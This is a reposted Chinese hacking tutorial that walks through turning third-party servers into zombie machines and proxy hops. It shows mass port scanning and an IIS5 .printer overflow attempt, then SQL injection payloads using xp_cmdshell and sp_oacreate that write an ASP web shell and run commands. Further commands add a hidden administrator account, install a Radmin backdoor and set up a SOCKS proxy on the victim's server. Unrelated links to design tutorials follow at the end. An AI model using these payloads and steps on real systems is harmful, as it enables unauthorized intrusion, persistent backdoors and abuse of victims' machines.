肉鸡+跳板 制作教程 多级肉鸡跳板

前些时候作了一些破解VIP的工作,结果发现肉鸡太少,昨天晚上我开始制作肉鸡

第一步

扫描

Usage: s TCP/SYN StartIP Ports

这个扫描软件是我扫肉鸡的得力助手

_______________________________________________________________

Microsoft Windows 2000

(C) 版权所有 1985-2000 Microsoft Corp.

中 =CYC= 国

D:s>s tcp xx.xx.0.1 xx.xx.255.255 3389 50 /save

D:s>s tcp 10.0.0.1 10.0.0.10 80 /save

TCP Port Scanner V1.1 By WinEggDrop

Normal Scan: About To Scan 10.0.0.1:10 Using 80 Thread

Scan xx.xx.xx.xx Complete In 3 Hours 34 Minutes 4 Seconds. Found 65536 Open Ports

________________________________________________________________

这个软件 可以用 syn 和TCP 2种, SYN 速度快,有些人喜欢用它搜索肉鸡,但是我喜欢 TCP

因为比较稳定。看大家了。

这样,到 根目录下就会生成一个文件 Result 扫描的结果就在这里

要注意一点,就是后面的线程 要根据自己的机器和网络速度而定!!!

下面就是 Result 的结果

-------------------------------------------------------------------------------

Performing Time: 11/21/2005 10:41:56 --> Normal Scan: About To Scan 65536 IP For 1 Ports Using 300 Thread

xx.xx.xx.xx 3389 open

xx.xx.xx.xx 3389 open

xx.xx.xx.xx 3389 open

xx.xx.xx.xx 3389 open

xx.xx.xx.xx 3389 open

xx.xx.xx.xx 3389 open

xx.xx.xx.xx 3389 open

.......

好,第二步了

通过我们得到的IP逐一攻克

首先找一个

xxx.xxx.xxx.69

让我们用溜光分析一下 (结果)

80(HTTP)

110(POP3)

443(HTTPS)

1433(MSSQL)

3389(TERMINAL)

25(SMTP)

CGI扫描

WEB版本信息: Microsoft-IIS/5.0

WWW 标题: XXX (都是看不懂的韩文,还好我的同屋有一个韩国人,^_^)

--------------------------------------------------------------------------------

Plugins

IIS5.0 .Printer Exploit(Grant System Privileges)

IIS 5.0 WEBDAV Exploit

第一眼我看见了80,这个是一个服务器了

其次是 1433

而且有漏洞,我到网上下了个iis5hack 配合NC 进行溢出

————————————————————————————

Microsoft Windows 2000

(C) 版权所有 1985-2000 Microsoft Corp.

中 =CYC= 国

D:s>iis5hack XXX.XXX.XXX.69 80 7 1999

iis5 remote .printer overflow. writen by sunx

http://www.sunx.org

for test only, dont used to hack, :p

connecting...

—————————————————————————————

然后开NC

这里面系统是我估计对方是win2k sp1 (后面证明了我是对的)
肉鸡+跳板 制作教程 多级肉鸡跳板

结果失败

大家不要放弃。。再来(已经很晚了,和朋友聊了聊天,给他发几个共享软件,然后就去睡觉了)

第2天 我针对 服务器的80 端口进行分析。首先我打开了他的网页。分析他的代码。还不错,估计是他们在别的网站DOWN下来的 没有什么漏洞

当我看到最后一页的新闻时候(新闻还是我同屋告诉我的,要不我也看不明白),发现了这个

http://XXX.XXX.XXX.69/wwwroot/wNewslist.asp?id=1278

利用简单的命令试验了一下

http://XXX.XXX.XXX.69/wwwroot/wNewslist.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:cyc.asp';--

发现客写入,哈哈!!!!(心里自然的。。。。欢快起来)

让我看看他的SQL版本拉

http://XXX.XXX.XXX.69/wwwroot/wNewslist.asp?id=1278and 1=(select @@VERSION)

看看反馈

Microsoft VBScript 编译器错误 错误 '800a03f6'

缺少 'End'

....../common/500-100.asp,行242

返回回来好多

我已经确定可以注入

好让我来看看能不能建立用户,首先不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD

CREATE TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)

DECLARE @shell INT

DECLARE @fso INT

DECLARE @file INT

DECLARE @isEnd BIT

DECLARE @out VARCHAR(400)

EXEC sp_oacreate 'wscript.shell',@shell output

EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:>c:temp.txt','0','true'

--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。

EXEC sp_oacreate 'scripting.filesystemobject',@fso output

EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt'

--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌

WHILE @shell>0

BEGIN

EXEC sp_oamethod @file,'Readline',@out out

INSERT INTO MYTMP(info) VALUES (@out)

EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out

IF @isEnd=1 BREAK

ELSE CONTINUE

END

DROP TABLE MYTMP

----------

DECLARE @shell INT

DECLARE @fso INT

DECLARE @file INT

DECLARE @isEnd BIT

DECLARE @out VARCHAR(400)

EXEC sp_oacreate 'wscript.shell',@shell output

EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:InetpubAdminScriptsadsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll" "C:winntsystem32inetsrvasp.dll">c:temp.txt','0','true'

EXEC sp_oacreate 'scripting.filesystemobject',@fso output

EXEC sp_oamethod @fso,'opentextfile',@file out,'c:temp.txt'

WHILE @shell>0

BEGIN

EXEC sp_oamethod @file,'Readline',@out out

INSERT INTO MYTMP(info) VALUES (@out)

EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out

IF @isEnd=1 BREAK

ELSE CONTINUE

END

好累啊。。。。。。。。。

反复看了好多便。。。还是打错了,干脆,不干托裤子放屁的事情了,到网上找了个 NBSI2API 直接来。

Net user

-------------------------------------------------------------------------------

admin aaaaaa Guest

IUSR_sdfdf aaaaaaaa eradf

Mjaid DJKJIDMKMI hakxie

IKJIMMLL

好,让我们添加一个用户

net use chinahacker ****** /add

成功了(其实我忘记了一个重要的步骤,就是+管理员用户组,因为高兴,忘记了,给自己带来了很多麻烦,大家注意哦,千万不要学我哦)

好开3389 登陆

用刚刚建立的用户名密码登陆,^_^成功了,刚要笑。。。。 系统出来一个提示,(正好我同屋不在。。。)不明白社那马意思。我想应该是对方对IP进行了限制,我问朋友要代理猎手,想找一个韩国的IP而且IP段是在 XXX.XXX.XXX.69这个段里面

同时到我们老大哥论坛发贴提问,想搞一个代理,结果,突然得到了高手的指点,提醒我是不是没有加入管理员组,我一看,可不是么。艾。。。。。。。。。。

加入管理员 Net localgroup administrators chinahacker /add

在登陆,呵呵,成功了

好了现在就是后门了

我选择radmin

我以前发过制作这个木马的教程 所以现在在这里就不讲解了,如果有需要的留下帖子和我联系,我在个别的教给大家

我登陆上我的主页下载了一个,然后用Radmin 连接。。。

成功。。^_^

然后我清理了一下痕迹,推出来,准备作下一步工作,作代理服务器了

当我再次打开Radmin 后,竟然连接不上!!!!!

我满脑的郁闷啊

难道是让人家发现了??????????

啊,讨厌,我在用3389 登陆看看,没有啊。。。我能进入啊,这是什么问题那?

我开始分析

我这回用Dos运行,结果一看,原来我作的自解压里面的 *.vbs 系统不让运行。。

结果无法导入注册表

好,我把 Radmin的 几个文件都上传上去,一个一个的运行,呵呵,成功了,

好在来,^_^,这次没有问题了,成功了

然后我们开始制作代理了

SkSockServer.exe

首先安装

d:sksockserver.exe -install

d:sksockserver.exe -config port 911 (这里输入你要代理的端口)

好了,让我们打开他的服务

Net start skserver

Net start 查看一下

Snake SockProxy Service (已经打开了) ^_^

好,现在让我们用SocksCap 尽情的欢快上网吧

感谢大家的支持,鄙视潜水员

  

爱华网本文地址 » http://www.413yy.cn/a/25101011/86992.html

更多阅读

淘宝网店模板制作教程 淘宝店铺免费模板

淘宝网店模板制作教程——简介很多开淘宝店的朋友想把网店弄的好看一定,但是苦于不会制作模板,今天就分享一下淘宝网店模板的制作。 淘宝网店模板制作教程——工具/原料 photoshop图片相关素材 淘宝网店模板制作教程——方法/步骤

影视后期制作教程 影视剪辑软件

影视后期制作教程——简介影视后期制作会应用到很多的软件我钟爱ADOBE公司软件。下面我就来向大家简单的来介绍一下如何使用AE来制作视频。(当然制作会很简单,不过这是基本流程!)影视后期制作教程——工具/原料AE软件影视后期制作教程

火焰字_火焰字制作教程 火焰字制作

火焰字_火焰字制作教程——简介火焰字似乎很酷很流行,下面来分享一下如何用PS来制作文字的火焰效果。火焰字_火焰字制作教程——方法/步骤火焰字_火焰字制作教程 1、首先我们打开PS,建立一个黑色背景的文档,用常用电脑中的字体写上你

圣诞贺卡制作教程 生日贺卡制作网站

圣诞贺卡制作教程——简介圣诞节怎么也少不了圣诞贺卡,而圣诞贺卡上的各种元素中怎么也少不了圣诞树。由于圣诞树独特的构造,使得立体圣诞贺卡中,圣诞树常常能够成为主角而出现在圣诞贺卡里。 圣诞贺卡制作教程——方法/步骤圣诞贺卡

闪图全屏QQ空间制作教程 闪图和闪字制作教程

闪图全屏QQ空间制作教程——简介全屏QQ空间大家都不陌生,以前还有百变空间也风靡一时过(就是每次进入QQ空间都变换不同的皮肤)。MV全屏QQ空间也为大家分享过。 这些制作方法都有些麻烦, 这里为大家分享一个很简单就能制作全屏QQ空间的方

声明:《肉鸡+跳板 制作教程 多级肉鸡跳板》为网友简单也是美分享!如侵犯到您的合法权益请联系我们删除